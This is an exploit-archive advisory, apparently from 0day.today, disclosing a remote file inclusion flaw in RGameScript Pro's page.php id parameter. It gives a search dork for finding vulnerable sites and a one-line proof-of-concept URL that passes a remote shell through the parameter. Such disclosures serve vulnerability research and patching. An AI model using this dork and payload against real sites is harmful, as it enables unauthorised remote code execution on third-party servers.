id: 2041
date: 07/20/2007
title: RGameScript Pro (page.php id) Remote File Inclusion Vulnerability
author: Warpboy
cves: 

=================================================================
RGameScript Pro (page.php id) Remote File Inclusion Vulnerability
=================================================================



#*/\*##*/\*##*/\*##*/\*##*/\*#
Web Application: RCMS-Pro
#*\/*##*\/*##*\/*##*\/*##*\/*#
Info: 
/////////////////////////////////////////////////////
Vulnerability: Remote File Inclusion
Vendor: http://www.rcms-pro.com/
Dork: "Powered by RGameScript"
Found By: Warpboy
Website: http://private-node.net
Shouts: TimQ, Gammarayz, Paradox, z6, PunkerX and everyone else at pnode.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
::PoC::

http://www.site.com/page.php?id=[shell]

******************************************



#  0day.today [2023-03-23]  #